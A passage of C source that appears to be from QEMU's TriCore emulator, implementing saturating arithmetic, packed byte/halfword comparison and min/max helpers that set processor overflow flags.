suov32_neg(env, result); } target_ulong helper_sub_h_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = extract32(r1, 0, 16) - extract32(r2, 0, 16); ret_hw1 = extract32(r1, 16, 16) - extract32(r2, 16, 16); return suov16(env, ret_hw0, ret_hw1); } target_ulong helper_mul_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result = t1 * t2; return ssov32(env, result); } target_ulong helper_mul_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = extract64(r1, 0, 32); int64_t t2 = extract64(r2, 0, 32); int64_t result = t1 * t2; return suov32_pos(env, result); } target_ulong helper_sha_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int32_t t2 = sextract64(r2, 0, 6); int64_t result; if (t2 == 0) { result = t1; } else if (t2 > 0) { result = t1 << t2; } else { result = t1 >> -t2; } return ssov32(env, result); } uint32_t helper_abs_ssov(CPUTriCoreState *env, target_ulong r1) { target_ulong result; result = ((int32_t)r1 >= 0) ? r1 : (0 - r1); return ssov32(env, result); } uint32_t helper_abs_h_ssov(CPUTriCoreState *env, target_ulong r1) { int32_t ret_h0, ret_h1; ret_h0 = sextract32(r1, 0, 16); ret_h0 = (ret_h0 >= 0) ? ret_h0 : (0 - ret_h0); ret_h1 = sextract32(r1, 16, 16); ret_h1 = (ret_h1 >= 0) ? ret_h1 : (0 - ret_h1); return ssov16(env, ret_h0, ret_h1); } target_ulong helper_absdif_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result; if (t1 > t2) { result = t1 - t2; } else { result = t2 - t1; } return ssov32(env, result); } uint32_t helper_absdif_h_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t t1, t2; int32_t ret_h0, ret_h1; t1 = sextract32(r1, 0, 16); t2 = sextract32(r2, 0, 16); if (t1 > t2) { ret_h0 = t1 - t2; } else { ret_h0 = t2 - t1; } t1 = sextract32(r1, 16, 16); t2 = sextract32(r2, 16, 16); if (t1 > t2) { ret_h1 = t1 - t2; } else { ret_h1 = t2 - t1; } return ssov16(env, ret_h0, ret_h1); } target_ulong helper_madd32_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result; result = t2 + (t1 * t3); return ssov32(env, result); } target_ulong helper_madd32_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { uint64_t t1 = extract64(r1, 0, 32); uint64_t t2 = extract64(r2, 0, 32); uint64_t t3 = extract64(r3, 0, 32); int64_t result; result = t2 + (t1 * t3); return suov32_pos(env, result); } uint64_t helper_madd64_ssov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, ovf; int64_t t1 = sextract64(r1, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul; mul = t1 * t3; ret = mul + r2; ovf = (ret ^ mul) & ~(mul ^ r2); t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if ((int64_t)ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul >= 0) { ret = INT64_MAX; /* ext_ret < MIN_INT */ } else { ret = INT64_MIN; } } else { env->PSW_USB_V = 0; } return ret; } uint32_t helper_madd32_q_add_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { int64_t result; result = (r1 + r2); env->PSW_USB_AV = (result ^ result * 2u); env->PSW_USB_SAV |= env->PSW_USB_AV; /* we do the saturation by hand, 
since we produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if (r2 == 0x8000000000000000LL) { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else { env->PSW_USB_V = 0; } } else { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else { env->PSW_USB_V = 0; } } return (uint32_t)result; } uint64_t helper_madd64_q_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = (int64_t)r1; int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result, mul; int64_t ovf; mul = (t2 * t3) << n; result = mul + t1; env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; ovf = (result ^ mul) & ~(mul ^ t1); /* we do the saturation by hand, since we produce an overflow on the host if the mul was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if ((r2 == 0x80000000) && (r3 == 0x80000000) && (n == 1)) { if (ovf >= 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul < 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } else { if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } return (uint64_t)result; } uint32_t helper_maddr_q_ssov(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 + mul + 0x8000; env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret > 0x7fffffffll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MAX; } else if (ret < -0x80000000ll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MIN; } else { env->PSW_USB_V = 0; } return ret & 0xffff0000ll; } uint64_t helper_madd64_suov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, mul; uint64_t t1 = extract64(r1, 0, 32); uint64_t t3 = extract64(r3, 0, 32); mul = t1 * t3; ret = mul + r2; t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret < r2) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* saturate */ ret = UINT64_MAX; } else { env->PSW_USB_V = 0; } return ret; } target_ulong helper_msub32_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result; result = t2 - (t1 * t3); return ssov32(env, result); } target_ulong helper_msub32_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { uint64_t t1 = extract64(r1, 0, 32); uint64_t t2 = extract64(r2, 0, 32); uint64_t t3 = extract64(r3, 0, 32); uint64_t result; uint64_t mul; mul = (t1 * t3); 
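    /* Added note: t1 and t3 are zero-extended 32-bit values, so mul uses the
     * full 64-bit range; e.g. with t2 = 5 and mul = 7 the subtraction below
     * wraps to 0xFFFFFFFFFFFFFFFE, which is why the saturation test that
     * follows compares (mul > t2) instead of checking the result's sign. */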
result = t2 - mul; env->PSW_USB_AV = result ^ result * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; /* we calculate ovf by hand here, because the multiplication can overflow on the host, which would give false results if we compare to less than zero */ if (mul > t2) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = 0; } else { env->PSW_USB_V = 0; } return result; } uint64_t helper_msub64_ssov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, ovf; int64_t t1 = sextract64(r1, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul; mul = t1 * t3; ret = r2 - mul; ovf = (ret ^ r2) & (mul ^ r2); t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if ((int64_t)ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul < 0) { ret = INT64_MAX; /* ext_ret < MIN_INT */ } else { ret = INT64_MIN; } } else { env->PSW_USB_V = 0; } return ret; } uint64_t helper_msub64_suov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, mul; uint64_t t1 = extract64(r1, 0, 32); uint64_t t3 = extract64(r3, 0, 32); mul = t1 * t3; ret = r2 - mul; t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret > r2) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* saturate */ ret = 0; } else { env->PSW_USB_V = 0; } return ret; } uint32_t helper_msub32_q_sub_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { int64_t result; int64_t t1 = (int64_t)r1; int64_t t2 = (int64_t)r2; result = t1 - t2; env->PSW_USB_AV = (result ^ result * 2u); env->PSW_USB_SAV |= env->PSW_USB_AV; /* we do the saturation by hand, since we produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if (r2 == 0x8000000000000000LL) { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else { env->PSW_USB_V = 0; } } else { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else { env->PSW_USB_V = 0; } } return (uint32_t)result; } uint64_t helper_msub64_q_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = (int64_t)r1; int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result, mul; int64_t ovf; mul = (t2 * t3) << n; result = t1 - mul; env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; ovf = (result ^ t1) & (t1 ^ mul); /* we do the saturation by hand, since we produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. 
*/ if (mul == 0x8000000000000000LL) { if (ovf >= 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } else { if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul < 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } return (uint64_t)result; } uint32_t helper_msubr_q_ssov(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 - mul + 0x8000; env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret > 0x7fffffffll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MAX; } else if (ret < -0x80000000ll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MIN; } else { env->PSW_USB_V = 0; } return ret & 0xffff0000ll; } uint32_t helper_abs_b(CPUTriCoreState *env, target_ulong arg) { int32_t b, i; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 4; i++) { b = sextract32(arg, i * 8, 8); b = (b >= 0) ? b : (0 - b); ovf |= (b > 0x7F) || (b < -0x80); avf |= b ^ b * 2u; ret |= (b & 0xff) << (i * 8); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_abs_h(CPUTriCoreState *env, target_ulong arg) { int32_t h, i; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { h = sextract32(arg, i * 16, 16); h = (h >= 0) ? h : (0 - h); ovf |= (h > 0x7FFF) || (h < -0x8000); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_absdif_b(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t b, i; int32_t extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 4; i++) { extr_r2 = sextract32(r2, i * 8, 8); b = sextract32(r1, i * 8, 8); b = (b > extr_r2) ? (b - extr_r2) : (extr_r2 - b); ovf |= (b > 0x7F) || (b < -0x80); avf |= b ^ b * 2u; ret |= (b & 0xff) << (i * 8); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_absdif_h(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t h, i; int32_t extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { extr_r2 = sextract32(r2, i * 16, 16); h = sextract32(r1, i * 16, 16); h = (h > extr_r2) ? 
(h - extr_r2) : (extr_r2 - h); ovf |= (h > 0x7FFF) || (h < -0x8000); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_addr_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_addsur_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_maddr_q(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 + mul + 0x8000; if ((ret > 0x7fffffffll) || (ret < -0x80000000ll)) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; } else { env->PSW_USB_V = 0; } env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret & 0xffff0000ll; } uint32_t helper_add_b(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t b, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; uint32_t ret = 0; for (i = 0; i < 4; i++) { extr_r1 = sextract32(r1, i * 8, 8); extr_r2 = sextract32(r2, i * 8, 8); b = extr_r1 + extr_r2; ovf |= ((b > 0x7f) || (b < -0x80)); avf |= b ^ b * 2u; ret |= ((b & 0xff) << (i*8)); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_add_h(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t h, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { extr_r1 = sextract32(r1, i * 16, 16); extr_r2 = sextract32(r2, i * 16, 16); h = extr_r1 + extr_r2; ovf |= ((h > 0x7fff) || (h < -0x8000)); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV 
|= env->PSW_USB_V; env->PSW_USB_AV = (avf << 16); env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_subr_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_subadr_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_msubr_q(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 - mul + 0x8000; if ((ret > 0x7fffffffll) || (ret < -0x80000000ll)) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; } else { env->PSW_USB_V = 0; } env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret & 0xffff0000ll; } uint32_t helper_sub_b(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t b, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; uint32_t ret = 0; for (i = 0; i < 4; i++) { extr_r1 = sextract32(r1, i * 8, 8); extr_r2 = sextract32(r2, i * 8, 8); b = extr_r1 - extr_r2; ovf |= ((b > 0x7f) || (b < -0x80)); avf |= b ^ b * 2u; ret |= ((b & 0xff) << (i*8)); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_sub_h(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t h, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { extr_r1 = sextract32(r1, i * 16, 16); extr_r2 = sextract32(r2, i * 16, 16); h = extr_r1 - extr_r2; ovf |= ((h > 0x7fff) || (h < -0x8000)); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_eq_b(target_ulong r1, target_ulong r2) { int32_t 
ret; int32_t i, msk; ret = 0; msk = 0xff; for (i = 0; i < 4; i++) { if ((r1 & msk) == (r2 & msk)) { ret |= msk; } msk = msk << 8; } return ret; } uint32_t helper_eq_h(target_ulong r1, target_ulong r2) { int32_t ret = 0; if ((r1 & 0xffff) == (r2 & 0xffff)) { ret = 0xffff; } if ((r1 & 0xffff0000) == (r2 & 0xffff0000)) { ret |= 0xffff0000; } return ret; } uint32_t helper_eqany_b(target_ulong r1, target_ulong r2) { int32_t i; uint32_t ret = 0; for (i = 0; i < 4; i++) { ret |= (sextract32(r1, i * 8, 8) == sextract32(r2, i * 8, 8)); } return ret; } uint32_t helper_eqany_h(target_ulong r1, target_ulong r2) { uint32_t ret; ret = (sextract32(r1, 0, 16) == sextract32(r2, 0, 16)); ret |= (sextract32(r1, 16, 16) == sextract32(r2, 16, 16)); return ret; } uint32_t helper_lt_b(target_ulong r1, target_ulong r2) { int32_t i; uint32_t ret = 0; for (i = 0; i < 4; i++) { if (sextract32(r1, i * 8, 8) < sextract32(r2, i * 8, 8)) { ret |= (0xff << (i * 8)); } } return ret; } uint32_t helper_lt_bu(target_ulong r1, target_ulong r2) { int32_t i; uint32_t ret = 0; for (i = 0; i < 4; i++) { if (extract32(r1, i * 8, 8) < extract32(r2, i * 8, 8)) { ret |= (0xff << (i * 8)); } } return ret; } uint32_t helper_lt_h(target_ulong r1, target_ulong r2) { uint32_t ret = 0; if (sextract32(r1, 0, 16) < sextract32(r2, 0, 16)) { ret |= 0xffff; } if (sextract32(r1, 16, 16) < sextract32(r2, 16, 16)) { ret |= 0xffff0000; } return ret; } uint32_t helper_lt_hu(target_ulong r1, target_ulong r2) { uint32_t ret = 0; if (extract32(r1, 0, 16) < extract32(r2, 0, 16)) { ret |= 0xffff; } if (extract32(r1, 16, 16) < extract32(r2, 16, 16)) { ret |= 0xffff0000; } return ret; } #define EXTREMA_H_B(name, op) \ uint32_t helper_##name ##_b(target_ulong r1, target_ulong r2) \ { \ int32_t i, extr_r1, extr_r2; \ uint32_t ret = 0; \ \ for (i = 0; i < 4; i++) { \ extr_r1 = sextract32(r1, i * 8, 8); \ extr_r2 = sextract32(r2, i * 8, 8); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= (extr_r1 & 0xff) << (i * 8); \ } \ return ret; \ } \ \ uint32_t helper_##name ##_bu(target_ulong r1, target_ulong r2)\ { \ int32_t i; \ uint32_t extr_r1, extr_r2; \ uint32_t ret = 0; \ \ for (i = 0; i < 4; i++) { \ extr_r1 = extract32(r1, i * 8, 8); \ extr_r2 = extract32(r2, i * 8, 8); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= (extr_r1 & 0xff) << (i * 8); \ } \ return ret; \ } \ \ uint32_t helper_##name ##_h(target_ulong r1, target_ulong r2) \ { \ int32_t extr_r1, extr_r2; \ uint32_t ret = 0; \ \ extr_r1 = sextract32(r1, 0, 16); \ extr_r2 = sextract32(r2, 0, 16); \ ret = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret = ret & 0xffff; \ \ extr_r1 = sextract32(r1, 16, 16); \ extr_r2 = sextract32(r2, 16, 16); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= extr_r1 << 16; \ \ return ret; \ } \ \ uint32_t helper_##name ##_hu(target_ulong r1, target_ulong r2)\ { \ uint32_t extr_r1, extr_r2; \ uint32_t ret = 0; \ \ extr_r1 = extract32(r1, 0, 16); \ extr_r2 = extract32(r2, 0, 16); \ ret = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret = ret & 0xffff; \ \ extr_r1 = extract32(r1, 16, 16); \ extr_r2 = extract32(r2, 16, 16); \ extr_r1 = (extr_r1 op extr_r2) ? 
extr_r1 : extr_r2; \ ret |= extr_r1 << (16); \ \ return ret; \ } \ \ uint64_t helper_ix##name(uint64_t r1, uint32_t r2) \ { \ int64_t r2l, r2h, r1hl; \ uint64_t ret = 0; \ \ ret = ((r1 + 2) & 0xffff); \ r2l = sextract64(r2, 0, 16); \ r2h = sextract64(r2, 16, 16); \ r1hl = sextract64(r1, 32, 16); \ \ if ((r2l op ## = r2h) && (r2l op r1hl)) { \ ret |= (r2l & 0xffff) << 32; \ ret |= extract64(r1, 0, 16) << 16; \ } else if ((r2h op r2l) && (r2h op r1hl)) { \ ret |= extract64(r2, 16, 16) << 32; \ ret |= extract64(r1 + 1, 0, 16) << 16; \ } else { \ ret |= r1 & 0xffffffff0000ull; \ } \ return ret; \ } \ \ uint64_t helper_ix##name ##_u(uint64_t r1, uint32_t r2) \ { \ int64_t r2l, r2h, r1hl; \ uint64_t ret = 0; \ \ ret = ((r1 + 2) & 0xffff); \ r2l = extract64(r2, 0, 16); \ r2h = extract64(r2, 16, 16); \ r1hl = extract64(r1, 32, 16); \ \ if ((r2l op ## = r2h) && (r2l op r1hl)) { \ ret |= (r2l & 0xffff) << 32; \ ret |= extract64(r1, 0, 16) << 16; \ } else if ((r2h op r2l) && (r2h op r1hl)) { \ ret |= extract64(r2, 16, 16) << 32; \ ret |= extract64(r1 + 1, 0, 16) << 16; \ } else { \ ret |= r1 & 0xffffffff0000ull; \ } \ return ret; \ } EXTREMA_H_B(max, >) EXTREMA_H_B(min, <) #undef EXTREMA_H_B uint32_t helper_clo_h(target_ulong r1) { uint32_t ret_hw0 = extract32(r1, 0, 16); uint32_t ret_hw1 = extract32(r1, 16, 16); ret_hw0 = clo32(ret_hw0 << 16); ret_hw1 = clo32(ret_hw1 << 16); if (ret_hw0 > 16) { ret_hw0 = 16; } if (ret_hw1 > 16) { ret_hw1 = 16; } return ret_hw0 | (ret_hw1 << 16); } uint32_t helper_clz_h(target_ulong r1) { uint32_t ret_hw0 = extract32(r1, 0, 16); uint32_t ret_hw1 = extract32(r1, 16, 16); ret_hw0 = clz32(ret_hw0 << 16); ret_hw1 = clz32(ret_hw1 << 16); if (ret_hw0 > 16) { ret_hw0 = 